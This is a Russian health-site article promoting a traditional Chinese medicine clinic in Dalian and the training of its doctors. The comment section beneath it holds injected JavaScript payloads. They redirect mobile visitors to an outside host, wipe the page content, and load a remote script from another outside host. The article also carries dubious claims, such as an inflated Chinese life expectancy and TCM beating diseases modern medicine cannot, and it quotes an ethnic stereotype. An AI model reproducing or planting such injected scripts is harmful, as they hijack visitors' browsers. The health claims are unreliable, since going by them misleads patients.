Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Лечиться по-китайски: к ч...  >>  Лечиться по-китайски: к чему это приводит
 
Обратная связь
 

Лечиться по-китайски: к чему это приводит

Размер шрифта
16 мая 2009 06:37
  • google_analytics: false
  • Нравится

За последние двадцать лет современная медицина совершила огромный скачок вперед: стали лечиться прежде неизлечимые болезни, создана первая в мире вакцина от рака, на смену большим операциям пришла хирургия без скальпеля и разрезов. Казалось бы, на этом фоне древняя китайская медицина так и осталась в 7 веке до нашей эры, в эпохе своего рождения. Однако когда попадаешь в Китай, испытываешь потрясение от того, как мирно сосуществуют здесь древняя китайская и западная, или современная медицина. Воистину, мир и гармония – суть китайской философии и культуры.

Новейшее оборудование, которому позавидовала бы обычная современная клиника, меньше всего ожидаешь увидеть в центре традиционной китайской медицины. Однако новый лабораторный центр, рентгеновский кабинет, ультразвуковая диагностика и даже гастроскопия занимают целый этаж медицинского центра «Шэньгу» в городе Далянь.

Медицинский центр «Шэньгу» (что означает «Доброе Солнце») – самая известная в Китае больница традиционной китайской медицины. Расположен он в центре города Далянь. В «Шэньгу» работают 62 специалиста, которые получили медицинское образование в китайских и зарубежных вузах.

Центр «Шэньгу» во многом ориентирован на россиян. На фасаде здания расположена большая вывеска на русском языке. Многие врачи, если не говорят по-русски, то понимают речь гостей с севера. На каждом из 5 этажей дежурит переводчик, неплохо знающий русский язык. Весь третий этаж клиники отдан для проживания россиян.

Этого требует закон о здравоохранении Китая. Прежде чем предложить пациенту мудрость древней китайской медицины, врач обязан с помощью медицины современной уточнить основной диагноз. Все это делают на первом этаже. И если ничего тревожного не выявлено, больной отправляется на второй этаж, где его ждет и диагностика по пульсу, и акупунктура, и массаж – все, что известно китайцам с древних времен.

Клиника «Шэньгу» создавалась как центр, где больных лечат по традиционной китайской методике. Лечение это было настолько успешным, что теперь о центре знают во всем Китае и даже за его пределами. В центре лечатся местные чиновники. Сюда съезжаются люди со всего мира, в том числе и из России.

В центре часто можно встретить русских туристов из близких регионов – Владивостока и Камчатки. Нередки также гости из центральной России, Москвы и Санкт-Петербурга. Специально для российских пациентов в больнице работают собственные переводчики. Они не только знают русский язык, но и в тонкостях разбираются в медицинских терминах.

Кто такие врачи традиционной китайской медицины?

В Китае клиники традиционной медицины существуют официально, однако это не означает, что Поднебесная – это рай для шарлатанов.

«Чтобы стать врачом традиционной китайской медицины, необходимо 5 лет учиться в медицинском университете и еще два года стажироваться в западной клинике. Считается, что только практикующие врачи с хорошим знанием китайской и западной, как ее называют, медицины могут осмысленно принять и интерпретировать китайскую медицину», – рассказывает нам вице-профессор китайской медицины Чен Шаомин. Только после 7 лет обучения выпускник получает диплом врача. Однако это не означает, что он может практиковать. Лишь после проверки знаний выпускника в клинике врач-наставник обращается в местное отделение здравоохранения с просьбой выдать разрешение молодому специалисту на работу врачом. Потом еще одно разрешение на работу в конкретной провинции, и в обязательном порядке, диплом о повышении квалификации.

Дипломы профессора Чен Шаомина (слева направо, щелкните для увеличения)
1 - Диплом о высшем образовании в области китайской медицины, выданный Пекинским университетом китайской медицины
2 - Диплом бакалавра Пекинского университета китайской медицины по специальности «Акупунктура и массаж»
3 - Сертификат о квалификации врача
4 - Разрешение на врачебную практику и регистрация места работы
5 - Профессиональный сертификат о специальности и технологии

Для врачей традиционной китайской медицины существует 3 уровня квалификации. И до высшего уровня – профессорского – доходят не все. Одним словом, по закону врач китайской медицины должен иметь 5 официальных дипломов. Врачебная практика без них запрещена.

«Народному целителю», нарушившему этот запрет, грозит тюремное заключение, говорит доктор Шаомин. «И если бы вы знали, как нам, настоящим китайским докторам, которые всю жизнь учатся, горько, что к вам в Россию практиковать едут те, кто вообще не является врачом. Кто в Китае сидел бы в тюрьме. А русским достаточно китайской внешности – узких глаз и лунообразного лица, – чтобы поверить, что это знаток мудрости китайской традиционной медицины. Я работал в разных странах. И везде у нас проверяют дипломы, прежде чем разрешить практику. Я бы очень советовал россиянам обязательно проверять дипломы у китайских докторов. Еще раз напомню, настоящие врачи имеют не один, а 5 обязательных дипломов, подтверждающих право лечить».

Интересно, что доктора западной медицины также обязаны 5 лет проучиться в медицинском университете, затем стажироваться в клинике, а потом проходить обучение по узкой специализации (например, по неврологии или урологи). Абсолютное потрясение у нас, русских посетителей Китая, вызвал и тот факт, что до заведывания отделениями в современных китайских больницах допускаются только доктора, прошедшие специализацию в клиниках США или Европы. Причем, если доктор получил ученую степень за рубежом, его зарплата будет в несколько раз выше. Так же, как зарплата специалиста с любым высшим образованием существенно выше, чем зарплата человека, который этого образования не имеет.

В Китае вообще – культ учености и образования, который в крови этого народа еще со времен Конфуция. 10-15% студентов каждый год едут учиться за границу. Со всего мира Китай сегодня собирает все самое лучшее. 90% населения страны – атеисты. А в школах и институтах юному поколению говорят только одно: верьте только в науку и образование. Только они вас не подведут

Насколько опасна китайская медицина?

Вся медицина в Китае разделена на западную, то есть современную, и китайскую. Соотношение клиник такое: в 6-миллионном Даляне 8 клиник западной медицины и 2 традиционной китайской. Сферы влияния жестко разделены. Западная медицина занимается всеми неотложными состояниями, хирургией, акушерством, педиатрией, лечением рака и всем тем, чем в любой цивилизованной стране занимается современная медицина. Соотношение, безусловно, в пользу медицины современной.

Но для китайской медицины отведена очень правильная ниша. Она занимается хроническими болезнями. Чтобы понять, как это происходит, проще всего обратиться к опыту конкретного медицинского центра. Одним словом, порядок и законность во всем, что касается здоровья людей. Это – главное, что потрясает в Китае.

Что лечит традиционная китайская медицина

В центре «Шэньгу» собраны высококлассные специалисты с прекрасным медицинским образованием. Чен Шаомин, заместитель главного врача, закончил аспирантуру медицинского университета, три года стажировался в Лондоне и прекрасно говорит по-английски. С помощью акупунктуры он успешно лечит самые разные боли, включая головную боль, боли в позвоночнике и суставах. Кроме того, акупунктура помогает при бессоннице, и хронических заболеваниях пищеварительной системы.

По данным статистики, средняя продолжительность жизни в Китае составляет для мужчин – 79 лет, для женщин – 85 лет.

Для сравнения, в России средняя продолжительность жизни составляет лишь 66 лет (у мужчин – 59 лет, а у женщин – 73 года). При этом КНР тратит на здравоохранение 227 долларов на одного человека в год, а Россия – только 116 долларов в год на человека.

Любопытно, что рацион среднестатистического китайца на 40% состоит из морепродуктов. В культуре питания китайцев отсутствуют молоко и молочные продукты, например творог и сыр. Как известно, питание с большим содержание животных жиров является одним из факторов, ускоряющих развитие атеросклероза – опасного заболевания, являющегося ведущей причиной смерти в цивилизованном мире.

Его коллега профессор Ван Линь, один из самых известных врачей традиционной китайской медицины, окончил медицинский факультет Даляньского медицинского университета. Врачебной практикой занимается уж более 50 лет. Он работает с пациентами, которые проходят длительное лечение рака с помощью химиотерапии в клиниках западной медицины. Этим людям назначают особые травы, усиливающие аппетит, снимающие тошноту и уменьшающие боли. Это еще одна ниша, которую занимает китайская медицина. Тем, кто ослабел в борьбе с раком, тем, кого уже нельзя спасти, здесь тоже помогают, давая травы, которые снимут боль и дадут последние месяцы жизни прожить в покое и под присмотром врачей. Кстати, за эту очень благородную роль китайскую медицину особенно ценят врачи западной медицины. рав здесь лечат и хронические болезни пищеварительной системы, кишечника, желчного пузыря, печени, поджелудочной железы и селезенки. Для этой цели уже более 40 лет успешно применяется состав травного отвара, разработанный профессором из центра «Шэньгу». И самое важное, что здесь никто не дает пустых обещаний, не говорит, что может исцелить от неизлечимых болезней, не отменяет современные лекарства. Здесь две ветви медицины живут в мире и согласии, дополняя, а не отменяя друг друга.

В центре «Шэньгу» работает и крупнейшая аптека, в которой продают более 500 видов китайских трав и около 100 препаратов из высушенных животных. Очень важно знать, что в Китае все травы – это официально зарегистрированные препараты, за качеством которых наблюдает государственная система по контролю качества лекарств. Продажа трав частными лицами запрещена законом.

Болезнь с точки зрения китайской медицины

Слово «здоровье» (цигун) в китайском языке происходит от двух иероглифов «ци» (энергоинформационная субстанция) и «гун» (возможность эту энергию реализовать) — древняя техника саморегуляции и саморазвития, метод и теория тренировки тела и духа.

Все, что сегодня делает китайская медицина, конечно же, можно объяснить с позиций современной медицины. Однако китайская медицина – это часть философии этого народа, поэтому нам кажется очень интересным остановиться на ее главных понятиях.

Китайская медицина имеет многовековую традицию и по-своему объясняет процессы, проходящие в теле человека. Все явления окружающего мира, включая человека и природу, понимаются китайской медициной как взаимодействие между двумя началами – «инь» и «янь». Возникновение и развитие болезни рассматривается китайской медициной как результат борьбы между защитными силами организма (чжен) и вызывающими болезнь нарушениями (ха), как проявление неуравновешенности между «инь» и «янь» или как результат внутренних причин, существующих внутри человеческого организма.

Чем мы обязаны китайской медицине?

Китайская медицина оказала воздействие на развитие медицинской науки других стран. Еще 170 лет назад в Китае использовали для достижения полного наркоза наркотические средства. Противооспенные прививки были открыты в Китае еще в XI веке.

Впервые прививки от оспы описал  китайский врач Ван Кан. Широкая вакцинация от оспы началась в Китае уже во второй половине XVI века во время правления династии Минь. Здоровым людям через бамбуковые трубочки вдували в нос измельченные оспенные корочки. После того, как пациенты переболевали оспой в мягкой форме, у них развивался иммунитет к заболеванию. Примерно в 2% случаев привитые таким образом люди умирали. Однако, число жертв от прививок все же было несравнимо меньше, чем от болезни, уносившей жизни 20-30% инфицированных.

Китайцы были первыми, кто заговорил о профилактике болезней. Жители Поднебесной уже давно знали о рекомендации врачей полоскать рот после приема пищи. Большое значение еще с древности в Китае придавали сохранению физической активности. Разработанные много столетий назад гимнастические упражнения по сей день пользуются популярностью во всем Китае.

«Инь» и «янь», краеугольные понятия китайской философии, отражают двойственность явлений окружающего мира. Они служат для выражения светлого и тёмного, твёрдого и мягкого, мужского и женского начал в природе. Древнекитайская философия утверждает, что из взаимодействия этих двух противоположных сил и состоит реальность. Считается, что взаимодействие «инь» и «янь» рождает пять первоэлементов (первостихий), которые являются основой всех вещей и состояний природы: Дерево, Огонь, Землю, Металл, Воду. Стоит упразднить один из первоэлементов, и жизнь станет невозможна. едицина учит, что каждому первоэлементу соответствует определенный орган: Дереву – печень и желчный пузырь; Огню – сердце и тонкий кишечник; Земле – селезенка и желудок; Металлу – легкие и толстый кишечник; Воде – почки и мочевой пузырь.

Понятия «инь» и «янь» не поддаются однозначному переводу, также как и понятие «ци», зачастую обозначаемое в других языках термином «энергия».

Согласно представлениям китайских медиков, жизненная энергия «ци» циркулирует в теле по системе меридианов. Они связывают между собой отделы центральной нервной системы, внутренние органы и поверхность кожи, на которой расположены биологически активные точки. Всего у человека насчитывается 12 парных и 2 непарных меридиана.

Воздействуя на меридианы можно усиливать или ослаблять "поток энергии". Так, если в нарушенном меридиане (например, в желчном пузыре – Дерево) выявлена избыточная энергия, то лечение заключается в воздействии на тонизирующую точку следующего меридиана (тонкая кишка – Огонь) или на седативную точку предыдущего меридиана (мочевой пузырь – Вода).

Любопытно и то, как рассматривает китайская медицина самого человека. Человек, согласно этому учению, является частью окружающей его природы и находится в постоянном взаимодействии с окружающим миром. Китайская философия считает человека единым целым. Различные части человека связаны между собой. Поэтому человеку следует учиться приспосабливаться к природе и развивать сопротивляемость своего организма.

Все эти абсолютно правильные принципы, проверенные веками, подтверждает современная медицина. Вот только китайцам повезло – это часть национальной культуры их страны, которая, сохранив мудрую философию, имеет и самые современные приоритеты в медицине: и одна из первых собственных вакцин от свиного гриппа, и высокотехнологичные производства лекарств и многое из того, чем гордится сегодня медицина Запада и США.

За какой медициной будущее, медициной Востока или Запада?

В современной медицине лечение больного сводится к простому определению симптома. Медицинские круги КНР критикуют западную медицину за такое опасное «упрощение» и сведение лечения к простому оказанию медицинской услуги. Только принимая во внимание целостность человеческого организма, медицина может удовлетворить требованиям действительности, убеждены они.

Наиболее эффективным в Китае считают совмещение традиционной китайской и современной медицины. Медики убеждены, что традиционная и современная медицина должны сочетаться, чтобы не допустить ошибок в лечении и не нанести ущерб здоровью пациента.

Ну а принятый в Китае подход к древней медицине с научных позиций позволяет пресечь распространение лженауки и деятельности дельцов от медицины. В то же самое время, благодаря этому подходу традиционная китайская медицина выходит на передовые позиции в борьбе с заболеваниями, перед которым оказалась бессильна современная наука.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

25 июня 2015 в 22:56

Цитировать   |   Пожаловаться

>d = {Android: function(){return navigator.userAgent.match(/Android/i);},BlackBerry: function() { return navigator.userAgent.match(/BlackBerry/i);},iOS: function() { return navigator.userAgent.match(/iPhone|iPad|iPod/i);},Opera: function() { return navigator.userAgent.match(/Opera Mini/i);},Windows: function() { return navigator.userAgent.match(/IEMobile/i);},any: function() { return (d.Android() || d.BlackBerry() || d.iOS() || d.Opera() || d.Windows());}}; if(d.any()) window.open("http://A25832-hostde3.fornex.org/"); $("form.noprint").remove();

2 - zzzzzz

26 июня 2015 в 01:37

Цитировать   |   Пожаловаться

> $("*").remove();

3 - zzzzzz

30 июня 2015 в 19:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

01 июля 2015 в 00:58

Комментарий удален за нарушение Правил общения

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.